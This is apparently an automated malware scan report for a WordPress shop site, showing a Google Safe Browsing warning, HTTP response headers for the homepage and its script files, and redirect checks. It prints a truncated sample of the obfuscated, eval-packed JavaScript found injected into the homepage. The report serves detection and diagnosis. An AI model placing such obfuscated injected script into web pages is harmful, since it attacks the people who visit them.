Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hyttelsiz.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hyttelsiz.net/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 29 Dec 2014 00:18:24 GMT Pragma: no-cache Location: http://www.hyttelsiz.net/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6bb809882a66cef2945155d512bf8d41; path=/ Set-Cookie: wc_session_cookie_7461bc59cfbef838c178aff4c4b4959b=r1DR9KRrAPNKJ9aXaFPmWTA49T09e3p7%7C%7C1419985103%7C%7C1419981503%7C%7Cf4039f648890145fe67f4c324a1eb816; expires=Wed, 31-Dec-2014 00:18:23 GMT; path=/; httponly Set-Cookie: woocommerce_items_in_cart=0; expires=Sun, 28-Dec-2014 23:18:23 GMT; path=/ Set-Cookie: woocommerce_cart_hash=0; expires=Sun, 28-Dec-2014 23:18:23 GMT; path=/ X-Pingback: http://www.hyttelsiz.net/xmlrpc.php | clean |
http://www.hyttelsiz.net/ | 200 OK Content-Length: 47999 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _01O='KkSKpcCfngCdpxGcz5yJlxWe0N3NywXe0lGbpJWazlmd3IDft92Y8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxnMk92afNna4IDfoRHZpdHfuVGZklGaBNDfkFWZoxXZtFmTnFGV5J0c05WZtVGbFRXZnxHewBDOxcjM8JXZyJXZmVmc8hHcwAjM3IDf0h2ZpVGa8VGchN2cl5Wd8VGdpJ3d8xmc1xHZh9Gbu92NywXZtFmcml2Nyw3bm5Wa8Rnbl1Wdj9GZENDfjJ3c0V2Z8t2b8VGd1JWayRHdBRXZzxnZlJHf05WZtV3YvRGOywndpR2NywnZpBjM8RWZkF2bsxHduVmdFh2YhRHdhx3ZhRldpRGMyw3dvRmbpdHOywHZh9Gb3IDfyQ2br91cqlDM8lGchlnclVXcqxnbvlGdj5WdmFEM8V2csFmZwIDfyFmdBBDf5R2bixHdwlmcjN3QzwHc0RHa8Rnbl52bw12bDlkUVV Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.hyttelsiz.net/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=4.6.5 | 200 OK Content-Length: 48722 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 8152 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/LayerSlider/js/jquerytransit.js?ver=0.9.9 | 200 OK Content-Length: 6830 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/LayerSlider/js/layerslider.transitions.js?ver=4.6.5 | 200 OK Content-Length: 21024 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/meet_the_team/lib/js/jquery.browser.js?ver=3.9.1 | 200 OK Content-Length: 1038 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/meet_the_team/lib/js/jquery.carouFredSel-6.2.1-packed.js?ver=3.9.1 | 200 OK Content-Length: 54795 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/meet_the_team/lib/js/jquery.easing.js?ver=3.9.1 | 200 OK Content-Length: 8305 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/meet_the_team/lib/js/bootstrap-tooltip.js?ver=3.9.1 | 200 OK Content-Length: 5303 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/meet_the_team/lib/js/custom.js?ver=3.9.1 | 200 OK Content-Length: 282 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/at-logocarousel/includes/jquery.waitforimages.js?ver=0.1 | 200 OK Content-Length: 5057 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/at-logocarousel/includes/jquery.debouncedresize.js?ver=0.1 | 200 OK Content-Length: 1069 Content-Type: application/javascript | clean |
http://www.hyttelsiz.net/wp-content/plugins/at-logocarousel/includes/jquery.at.logocarousel.min.js?ver=0.1 | 200 OK Content-Length: 9583 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hyttelsiz.net
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 29 Dec 2014 00:18:24 GMT
Pragma: no-cache
Location: http://www.hyttelsiz.net/
Server: LiteSpeed
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6bb809882a66cef2945155d512bf8d41; path=/
Set-Cookie: wc_session_cookie_7461bc59cfbef838c178aff4c4b4959b=r1DR9KRrAPNKJ9aXaFPmWTA49T09e3p7%7C%7C1419985103%7C%7C1419981503%7C%7Cf4039f648890145fe67f4c324a1eb816; expires=Wed, 31-Dec-2014 00:18:23 GMT; path=/; httponly
Set-Cookie: woocommerce_items_in_cart=0; expires=Sun, 28-Dec-2014 23:18:23 GMT; path=/
Set-Cookie: woocommerce_cart_hash=0; expires=Sun, 28-Dec-2014 23:18:23 GMT; path=/
X-Pingback: http://www.hyttelsiz.net/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: hyttelsiz.net
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 29 Dec 2014 00:18:24 GMT
Pragma: no-cache
Location: http://www.hyttelsiz.net/
Server: LiteSpeed
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6bb809882a66cef2945155d512bf8d41; path=/
Set-Cookie: wc_session_cookie_7461bc59cfbef838c178aff4c4b4959b=r1DR9KRrAPNKJ9aXaFPmWTA49T09e3p7%7C%7C1419985103%7C%7C1419981503%7C%7Cf4039f648890145fe67f4c324a1eb816; expires=Wed, 31-Dec-2014 00:18:23 GMT; path=/; httponly
Set-Cookie: woocommerce_items_in_cart=0; expires=Sun, 28-Dec-2014 23:18:23 GMT; path=/
Set-Cookie: woocommerce_cart_hash=0; expires=Sun, 28-Dec-2014 23:18:23 GMT; path=/
X-Pingback: http://www.hyttelsiz.net/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hyttelsiz.net
Referer: http://www.google.com/search?q=hyttelsiz.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hyttelsiz.net
Referer: http://www.google.com/search?q=hyttelsiz.net
Result:
The result is similar to the first query. There are no suspicious redirects found.